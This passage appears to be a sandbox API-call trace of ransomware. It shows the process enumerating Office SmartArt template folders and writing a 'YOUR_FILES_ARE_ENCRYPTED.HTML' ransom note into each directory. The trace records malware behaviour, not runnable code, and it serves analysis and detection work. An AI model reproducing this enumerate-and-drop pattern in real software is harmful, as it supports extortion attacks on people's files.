ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c48439, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c48439, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f84ae, dwReserved1=0x6f83e0, cFileName="..", cAlternateFileName="")) returned 1 [0123.208] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97837aab, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97837aab, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x97837aab, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1697, dwReserved0=0x6f84ae, dwReserved1=0x6f83e0, cFileName="TM03328884[[fn=architecture]].glox", cAlternateFileName="TM0332~4.GLO")) returned 1 [0123.208] StrStrIW (lpFirst="TM03328884[[fn=architecture]].glox", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.208] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328884[[fn=architecture]].glox") returned 142 [0123.208] PathFindExtensionW (pszPath="TM03328884[[fn=architecture]].glox") returned=".glox" [0123.208] lstrlenW (lpString=".glox") returned 5 [0123.208] PathFindExtensionW (pszPath="TM03328884[[fn=architecture]].glox") returned=".glox" [0123.208] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97fe91ef, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97fe91ef, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x97fea554, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xfba, dwReserved0=0x6f84ae, dwReserved1=0x6f83e0, cFileName="TM03328893[[fn=BracketList]].glox", cAlternateFileName="TME5C2~1.GLO")) returned 1 [0123.208] StrStrIW (lpFirst="TM03328893[[fn=BracketList]].glox", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.208] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328893[[fn=BracketList]].glox") returned 141 [0123.208] PathFindExtensionW (pszPath="TM03328893[[fn=BracketList]].glox") returned=".glox" [0123.208] lstrlenW (lpString=".glox") returned 5 [0123.208] PathFindExtensionW (pszPath="TM03328893[[fn=BracketList]].glox") returned=".glox" [0123.208] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9776d1cd, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9776d1cd, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9776d1cd, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1093, dwReserved0=0x6f84ae, dwReserved1=0x6f83e0, cFileName="TM03328905[[fn=Chevron Accent]].glox", cAlternateFileName="TM0332~2.GLO")) returned 1 [0123.208] StrStrIW (lpFirst="TM03328905[[fn=Chevron Accent]].glox", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.208] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328905[[fn=Chevron Accent]].glox") returned 144 [0123.208] PathFindExtensionW (pszPath="TM03328905[[fn=Chevron Accent]].glox") returned=".glox" [0123.208] lstrlenW (lpString=".glox") returned 5 [0123.208] PathFindExtensionW (pszPath="TM03328905[[fn=Chevron Accent]].glox") returned=".glox" [0123.208] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97706a49, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97706a49, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x97707caf, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x41a6, dwReserved0=0x6f84ae, dwReserved1=0x6f83e0, cFileName="TM03328908[[fn=Circle Process]].glox", cAlternateFileName="TM0332~1.GLO")) returned 1 [0123.208] StrStrIW (lpFirst="TM03328908[[fn=Circle Process]].glox", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.208] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328908[[fn=Circle Process]].glox") returned 144 [0123.208] PathFindExtensionW (pszPath="TM03328908[[fn=Circle Process]].glox") returned=".glox" [0123.209] lstrlenW (lpString=".glox") returned 5 [0123.209] PathFindExtensionW (pszPath="TM03328908[[fn=Circle Process]].glox") returned=".glox" [0123.209] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97de9b8d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97de9b8d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x97deae93, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2c74, dwReserved0=0x6f84ae, dwReserved1=0x6f83e0, cFileName="TM03328916[[fn=Converging Text]].glox", cAlternateFileName="TMF131~1.GLO")) returned 1 [0123.212] StrStrIW (lpFirst="TM03328916[[fn=Converging Text]].glox", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.212] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328916[[fn=Converging Text]].glox") returned 145 [0123.212] PathFindExtensionW (pszPath="TM03328916[[fn=Converging Text]].glox") returned=".glox" [0123.212] lstrlenW (lpString=".glox") returned 5 [0123.212] PathFindExtensionW (pszPath="TM03328916[[fn=Converging Text]].glox") returned=".glox" [0123.212] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98433dab, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98433dab, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98435131, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1788, dwReserved0=0x6f84ae, dwReserved1=0x6f83e0, cFileName="TM03328919[[fn=Hexagon Radial]].glox", cAlternateFileName="TM6EE1~1.GLO")) returned 1 [0123.212] StrStrIW (lpFirst="TM03328919[[fn=Hexagon Radial]].glox", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.212] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328919[[fn=Hexagon Radial]].glox") returned 144 [0123.212] PathFindExtensionW (pszPath="TM03328919[[fn=Hexagon Radial]].glox") returned=".glox" [0123.212] lstrlenW (lpString=".glox") returned 5 [0123.212] PathFindExtensionW (pszPath="TM03328919[[fn=Hexagon Radial]].glox") returned=".glox" [0123.212] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98403091, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98403091, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98404408, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x23e7, dwReserved0=0x6f84ae, dwReserved1=0x6f83e0, cFileName="TM03328925[[fn=Interconnected Block Process]].glox", cAlternateFileName="TM5FE4~1.GLO")) returned 1 [0123.212] StrStrIW (lpFirst="TM03328925[[fn=Interconnected Block Process]].glox", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.212] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328925[[fn=Interconnected Block Process]].glox") returned 158 [0123.212] PathFindExtensionW (pszPath="TM03328925[[fn=Interconnected Block Process]].glox") returned=".glox" [0123.212] lstrlenW (lpString=".glox") returned 5 [0123.212] PathFindExtensionW (pszPath="TM03328925[[fn=Interconnected Block Process]].glox") returned=".glox" [0123.212] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x984400fa, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x984400fa, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x984400fa, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x10e6, dwReserved0=0x6f84ae, dwReserved1=0x6f83e0, cFileName="TM03328932[[fn=Picture Frame]].glox", cAlternateFileName="TMD322~1.GLO")) returned 1 [0123.213] StrStrIW (lpFirst="TM03328932[[fn=Picture Frame]].glox", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.213] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328932[[fn=Picture Frame]].glox") returned 143 [0123.213] PathFindExtensionW (pszPath="TM03328932[[fn=Picture Frame]].glox") returned=".glox" [0123.213] lstrlenW (lpString=".glox") returned 5 [0123.213] PathFindExtensionW (pszPath="TM03328932[[fn=Picture Frame]].glox") returned=".glox" [0123.213] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x980f6e44, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x980f6e44, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x980f6e44, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1cca, dwReserved0=0x6f84ae, dwReserved1=0x6f83e0, cFileName="TM03328935[[fn=Picture Organization Chart]].glox", cAlternateFileName="TMB8BB~1.GLO")) returned 1 [0123.213] StrStrIW (lpFirst="TM03328935[[fn=Picture Organization Chart]].glox", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.213] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328935[[fn=Picture Organization Chart]].glox") returned 156 [0123.213] PathFindExtensionW (pszPath="TM03328935[[fn=Picture Organization Chart]].glox") returned=".glox" [0123.213] lstrlenW (lpString=".glox") returned 5 [0123.213] PathFindExtensionW (pszPath="TM03328935[[fn=Picture Organization Chart]].glox") returned=".glox" [0123.213] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9824557b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9824557b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9824557b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x15dc, dwReserved0=0x6f84ae, dwReserved1=0x6f83e0, cFileName="TM03328940[[fn=Radial Picture List]].glox", cAlternateFileName="TMC309~1.GLO")) returned 1 [0123.213] StrStrIW (lpFirst="TM03328940[[fn=Radial Picture List]].glox", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.213] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328940[[fn=Radial Picture List]].glox") returned 149 [0123.213] PathFindExtensionW (pszPath="TM03328940[[fn=Radial Picture List]].glox") returned=".glox" [0123.213] lstrlenW (lpString=".glox") returned 5 [0123.213] PathFindExtensionW (pszPath="TM03328940[[fn=Radial Picture List]].glox") returned=".glox" [0123.213] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978020a2, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x978020a2, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x978034d1, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xe63, dwReserved0=0x6f84ae, dwReserved1=0x6f83e0, cFileName="TM03328951[[fn=Tabbed Arc]].glox", cAlternateFileName="TM0332~3.GLO")) returned 1 [0123.213] StrStrIW (lpFirst="TM03328951[[fn=Tabbed Arc]].glox", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.213] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328951[[fn=Tabbed Arc]].glox") returned 140 [0123.213] PathFindExtensionW (pszPath="TM03328951[[fn=Tabbed Arc]].glox") returned=".glox" [0123.213] lstrlenW (lpString=".glox") returned 5 [0123.213] PathFindExtensionW (pszPath="TM03328951[[fn=Tabbed Arc]].glox") returned=".glox" [0123.213] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x983aecac, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x983aecac, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x983affea, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1318, dwReserved0=0x6f84ae, dwReserved1=0x6f83e0, cFileName="TM03328972[[fn=Tab List]].glox", cAlternateFileName="TM2A4A~1.GLO")) returned 1 [0123.213] StrStrIW (lpFirst="TM03328972[[fn=Tab List]].glox", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.213] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328972[[fn=Tab List]].glox") returned 138 [0123.213] PathFindExtensionW (pszPath="TM03328972[[fn=Tab List]].glox") returned=".glox" [0123.213] lstrlenW (lpString=".glox") returned 5 [0123.213] PathFindExtensionW (pszPath="TM03328972[[fn=Tab List]].glox") returned=".glox" [0123.213] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x983bfdac, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x983bfdac, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x983bfdac, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1930, dwReserved0=0x6f84ae, dwReserved1=0x6f83e0, cFileName="TM03328975[[fn=Theme Picture Accent]].glox", cAlternateFileName="TM8247~1.GLO")) returned 1 [0123.213] StrStrIW (lpFirst="TM03328975[[fn=Theme Picture Accent]].glox", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.213] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328975[[fn=Theme Picture Accent]].glox") returned 150 [0123.213] PathFindExtensionW (pszPath="TM03328975[[fn=Theme Picture Accent]].glox") returned=".glox" [0123.214] lstrlenW (lpString=".glox") returned 5 [0123.214] PathFindExtensionW (pszPath="TM03328975[[fn=Theme Picture Accent]].glox") returned=".glox" [0123.214] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98c45cf1, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c45cf1, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c47043, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x15fe, dwReserved0=0x6f84ae, dwReserved1=0x6f83e0, cFileName="TM03328983[[fn=Theme Picture Alternating Accent]].glox", cAlternateFileName="TM8366~1.GLO")) returned 1 [0123.214] StrStrIW (lpFirst="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.214] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328983[[fn=Theme Picture Alternating Accent]].glox") returned 162 [0123.214] PathFindExtensionW (pszPath="TM03328983[[fn=Theme Picture Alternating Accent]].glox") returned=".glox" [0123.214] lstrlenW (lpString=".glox") returned 5 [0123.214] PathFindExtensionW (pszPath="TM03328983[[fn=Theme Picture Alternating Accent]].glox") returned=".glox" [0123.214] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9879b688, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9879b688, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9879b688, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1831, dwReserved0=0x6f84ae, dwReserved1=0x6f83e0, cFileName="TM03328986[[fn=Theme Picture Grid]].glox", cAlternateFileName="TM02CE~1.GLO")) returned 1 [0123.214] StrStrIW (lpFirst="TM03328986[[fn=Theme Picture Grid]].glox", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.214] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328986[[fn=Theme Picture Grid]].glox") returned 148 [0123.214] PathFindExtensionW (pszPath="TM03328986[[fn=Theme Picture Grid]].glox") returned=".glox" [0123.214] lstrlenW (lpString=".glox") returned 5 [0123.214] PathFindExtensionW (pszPath="TM03328986[[fn=Theme Picture Grid]].glox") returned=".glox" [0123.214] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98ad5311, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98ad5311, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98ad5311, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xc03, dwReserved0=0x6f84ae, dwReserved1=0x6f83e0, cFileName="TM03328990[[fn=Varying Width List]].glox", cAlternateFileName="TM6E5C~1.GLO")) returned 1 [0123.214] StrStrIW (lpFirst="TM03328990[[fn=Varying Width List]].glox", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.214] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328990[[fn=Varying Width List]].glox") returned 148 [0123.214] PathFindExtensionW (pszPath="TM03328990[[fn=Varying Width List]].glox") returned=".glox" [0123.214] lstrlenW (lpString=".glox") returned 5 [0123.214] PathFindExtensionW (pszPath="TM03328990[[fn=Varying Width List]].glox") returned=".glox" [0123.214] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98913495, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98913495, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98913495, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x141f, dwReserved0=0x6f84ae, dwReserved1=0x6f83e0, cFileName="TM03328998[[fn=Rings]].glox", cAlternateFileName="TM5448~1.GLO")) returned 1 [0123.214] StrStrIW (lpFirst="TM03328998[[fn=Rings]].glox", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.214] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328998[[fn=Rings]].glox") returned 135 [0123.214] PathFindExtensionW (pszPath="TM03328998[[fn=Rings]].glox") returned=".glox" [0123.214] lstrlenW (lpString=".glox") returned 5 [0123.214] PathFindExtensionW (pszPath="TM03328998[[fn=Rings]].glox") returned=".glox" [0123.214] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98913495, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98913495, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98913495, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x141f, dwReserved0=0x6f84ae, dwReserved1=0x6f83e0, cFileName="TM03328998[[fn=Rings]].glox", cAlternateFileName="TM5448~1.GLO")) returned 0 [0123.214] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0123.218] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 137 [0123.218] GetProcessHeap () returned 0x600000 [0123.218] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.218] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0123.220] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19d840, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19d840*=0x3c00, lpOverlapped=0x0) returned 1 [0123.221] CloseHandle (hObject=0x31c) returned 1 [0123.221] GetProcessHeap () returned 0x600000 [0123.221] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.221] GetProcessHeap () returned 0x600000 [0123.222] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0123.222] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c48439, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c48439, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188410, dwReserved1=0x632e00, cFileName="1033", cAlternateFileName="")) returned 0 [0123.222] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0123.222] wnsprintfW (in: pszDest=0x3350010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 132 [0123.222] GetProcessHeap () returned 0x600000 [0123.222] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0123.223] WriteFile (in: hFile=0x30c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19db54, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19db54*=0x3c00, lpOverlapped=0x0) returned 1 [0123.224] CloseHandle (hObject=0x30c) returned 1 [0123.224] GetProcessHeap () returned 0x600000 [0123.224] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.225] GetProcessHeap () returned 0x600000 [0123.225] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3350010 | out: hHeap=0x600000) returned 1 [0123.225] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, 